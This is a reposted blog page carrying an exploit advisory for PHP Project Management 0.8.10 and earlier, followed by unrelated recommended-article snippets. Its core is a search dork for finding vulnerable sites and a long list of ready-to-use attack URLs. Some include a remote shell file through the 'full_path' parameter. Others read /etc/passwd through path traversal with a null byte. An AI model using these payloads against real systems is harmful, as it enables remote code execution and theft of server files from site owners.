php project management,PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

于 2021-03-24 08:03:34 发布
阅读量82 收藏
点赞数
文章标签: php project management

# PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

# http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz

# DORK : "PHP Project Management 0.8.10"

# POC : RFI

# /modules/certinfo/index.php?full_path=http://localhost/shell.txt?

# /modules/emails/index.php?full_path=http://localhost/shell.txt?

# /modules/events/index.php?full_path=http://localhost/shell.txt?

# /modules/fax/index.php?full_path=http://localhost/shell.txt?

# /modules/files/index.php?full_path=http://localhost/shell.txt?

# /modules/files/list.php?full_path=http://localhost/shell.txt?

# /modules/groupadm/index.php?full_path=http://localhost/shell.txt?

# /modules/history/index.php?full_path=http://localhost/shell.txt?

# /modules/info/index.php?full_path=http://localhost/shell.txt?

# /modules/log/index.php?full_path=http://localhost/shell.txt?

# /modules/mail/index.php?full_path=http://localhost/shell.txt?

# /modules/messages/index.php?full_path=http://localhost/shell.txt?

# /modules/organizations/index.php?full_path=http://localhost/shell.txt?

# /modules/phones/index.php?full_path=http://localhost/shell.txt?

# /modules/presence/index.php?full_path=http://localhost/shell.txt?

# /modules/projects/index.php?full_path=http://localhost/shell.txt?

# /modules/projects/summary.inc.php?full_path=http://localhost/shell.txt?

# /modules/projects/list.php?full_path=http://localhost/shell.txt?

# /modules/reports/index.php?full_path=http://localhost/shell.txt?

# /modules/search/index.php?full_path=http://localhost/shell.txt?

# /modules/snf/index.php?full_path=http://localhost/she ll.txt?

# /modules/syslog/index.php?full_path=http://localhost/shell.txt?

# /modules/tasks/searchsimilar.php?full_path=http://localhost/shell.txt?

# /modules/tasks/index.php?full_path=http://localhost/shell.txt?

# /modules/tasks/summary.inc.php?full_path=http://localhost/shell.txt?

# /modules/useradm/index.php?full_path=http://localhost/shell.txt?

# /ajax/loadsplash.php?full_path=http://localhost/shell.txt?

# /blocks/birthday.php?full_path=http://localhost/shell.txt?

# /blocks/events.php?full_path=http://localhost/shell.txt?

# /blocks/help.php?full_path=http://localhost/shell.txt?

# POC : LFI

# /modules/certinfo/index.php?module=../../../../../../etc/passwd%00

# /modules/emails/index.php?module=../../../../../../etc/passwd%00

# /modules/events/index.php?module=../../../../../../etc/passwd%00

# /modules/fax/index.php?module=../../../../../../etc/passwd%00

# /modules/files/index.php?module=../../../../../../etc/passwd%00

# /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00

# /modules/groupadm/index.php?module=../../../../../../etc/passwd%00

# /modules/history/index.php?module=../../../../../../etc/passwd%00

# /modules/info/index.php?module=../../../../../../etc/passwd%00

# /modules/log/index.php?module=../../../../../../etc/passwd%00

# /modules/mail/index.php?module=../../../../../../etc/passwd%00

# /modules/messages/index.php?module=../../../../../../etc/passwd%00

# /modules/organizations/index.php?module=../../../../../../etc/passwd%00

# /modules/phones/index.php?module=../../../../../../etc/passwd%00

# /modules/presence/index.php?module=../../../../../../etc/passwd%00

# /modules/projects/index.php?module=../../../../../../etc/passwd%00

# /modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00

# /modules/projects/list.php?module=../../../../../../etc/passwd%00

# /modules/reports/index.php?module=../../../../../../etc/passwd%00

# /modules/search/index.php?module=../../../../../../etc/passwd%00

# /modules/snf/index.php?module=../../../../../../etc/passwd%00

# /modules/syslog/index.php?module=../../../../../../etc/passwd%00

# /modules/tasks/index.php?module=../../../../../../etc/passwd%00

# /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00

# /modules/useradm/index.php?module=../../../../../../etc/passwd%00

# sebug.net

暴躁毒舌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rashyyy_e-supervision_phpmysql_projectmanagement_
10-04
project report on electronic supervision for project management system
php project management,PHPProject: A pure PHP library for reading and writing project management fil...
weixin_39581571的博客
03-10 164
PHPProjectPHPProject is a library written in pure PHP that provides a set of classes to write to different project management file formats, i.e. Microsoft MSProjectExchange (MPX) or GanttProject (GAN)...
MyT - Project Management:基于PHP和MySQL / SQLite的项目管理系统-开源
05-12
MyT(管理您的团队)-是一个免费的开源任务管理和项目管理系统,基于Yii Framework,易于使用并且对未来的发展具有广阔的前景。 您可以创建一个或多个项目,并为每个项目管理几种类型的任务。 您还可以创建和管理时间表小时数。 Myt可以基于某些事件(例如任务分配和项目关联)发送电子邮件通知。 所有功能都可以从“管理面板”进行配置。
TaskPm - Project Management:基于LAMP的项目管理系统-开源
05-12
TaskPm(基于任务的项目管理)是使用PHP / mySQL实现的项目管理软件。
python 使用python-docx==0.8.10 生成word 并已数据流的形式 进行下载
QQ1752506968的博客
04-16 915
生成效果: 生成代码 from docx import Document from docx.shared import Inches,Pt from docx.oxml.ns import qn from django.http import HttpResponse,FileResponse import cStringIO, urllib2 import datetim...
ubuntus16.04下apache2+php7.2+mysql8.0环境搭建
师从小白
09-10 1811
步骤 安装apache2 安装php7.2 安装apache2支持模块php7.2 安装mysql8.0 安装php7.2支持模块mysql 测试环境 安装apache2  &gt;&gt; apt-get install apache2 附:重启apache2命令 /etc/init.d/apache2 restart 或者 service apache2 restart 安...
magento php mysql_magento 资源配置 mysql4-install-0.1.0.php为什么没有执行
weixin_35349247的博客
01-27 143
展开全部对于任何一32313133353236313431303231363533e59b9ee7ad9431333361326333个更新频繁的项目来说,保持开发环境和生产环境的数据库同步是件很头疼的事情。Magento提供了一套系统,用版本化的资源迁移脚本来解决这个问题。上一章,我们为 Helloworld Blogpost 创建了一个模型。我们直接通过SQL语句“CREATE TABLE”来...
mysql c 0.8.10_10 个开发者必知的 MySQL 8.0 新功能
weixin_30999669的博客
02-02 60
下面将以 MySQL 社区的优先级从高到低来展示这些功能:TOP 10MySQL 文档存储默认 utf8mb4 编码JSON 增强CTEs(译者注:Common Table Expresssions 公共表格表达式)窗口函数降序索引更好的优化器消费模型MySQL 服务器组件GIS(译者注:Geographic Information System 地理信息系统) 提升InnoDB 引擎的 NO W...
mysql c 0.8.10_Windows 10 安装 MySQL 8.0 指南
weixin_28222493的博客
02-07 91
今天下午,游戏正high,小强一个微信告诉我,需要我帮他写个MySQL语句。这种第四代语言,在我们这种不搞数据科学的人手里,也就当成存储服务使用,正儿八经写SQL语句倒是没怎么搞过,用的时候现翻书是常态。Mac上的MySQL已经很久没有用过了。这次挑战一下Windows 10 平台的MySQL 8.0的安装、连接、调试。之前我说过,在Windows 的.Net平台下,做很多开发还是很舒服的。但是S...
project_code_print:打印源代码到word文档里面,方便纸质阅读。简易树形图,压缩代码行间距,尽量节省纸张
03-23
说明 打印源代码到word文档里面,方便...点安装python-docx == 0.8.10 进入要打印的目录下面,把project_code_print.py拷贝进去 运行python project_code_print.py即可,会在当前目录下生成一个ode_print.docx的文件。
Lemmy仿Reddit社区 v0.8.10
12-28
为您提供Lemmy仿Reddit社区下载,Lemmy是一个Rust实现的类似于 Reddit、Lobste.rs、Raddle 与 Hacker News 等网站的项目,用户订阅感兴趣的论坛、发布链接和讨论,可以进行点赞/点踩,并对它们发表评论。...
linux下用c语言 用LiTE-0.8.10 Dfb 矢量字库实现例子, 实现的流程的一个例子
09-10
linux下用c语言 用LiTE-0.8.10 Dfb 矢量字库实现例子, 实现的流程的一个例子
ilixi1.0.0 LiTE0.8.10
06-14
《基于DirectFB的轻量级C++ UI工具包——ilixi1.0.0与LiTE0.8.10详解》 在嵌入式Linux系统开发领域,高效的用户界面(UI)工具包至关重要。ilixi1.0.0和LiTE0.8.10就是两个为这类系统设计的专门工具,它们基于...
Python库 | pygling-0.8.10.zip
04-30
资源分类:Python库 所属语言:Python 资源全名:pygling-0.8.10.zip 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
python中的json、pickle
junex的博客
04-07 362
json 提供了四个功能: dumps:将json数据转换为字符串 json.dumps(obj,skipkeys=False,separators=None,sort_keys=False) loads将字符串加载为json数据 json.loads(s) dump:将json数据序列化到文件 json.dump(obj, fp, sort_keys=False,) load:从文件加...
androidpn 0.5.0客户端 asmack 类库更新到 android8-0.8.10
王洪伟的专栏
05-12 4224
androidpn 0.5.0 客户端使用了asmack,已经很久没有更新了。为了xiu gai
Ubuntu16.04搭建OwnCloud私人网盘(纯小白教学,步骤清晰)
u014330065的博客
03-30 1319
漫长的假期总要做点什么,突然想起自己还有一年的华为云服务器,再知乎上搜索个人云服务器可以用来做什么时,受到启发,决定搭建一个基于OwnCloud的私人网盘。下面是具体步骤。 一. 添加清华源 在搭建LAMP开发环境时,软件下载速度过慢,所有我首先添加了清华源。 使用Xshell连接远程服务器 cd /etc/apt #进入/etc/apt目录 找到sources.list文件...
python下载安装.zip
最新发布
09-01
python下载安装
python-docx-0.8.10.tar.gz
05-14
Python-docx-0.8.10.tar.gz是一个Python库,可用于创建和修改Microsoft Word文档。它提供了一组简单的API,使用户可以使用Python代码创建具有格式的文本,表格,图像和其他元素的Word文档。Python-docx还提供了访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值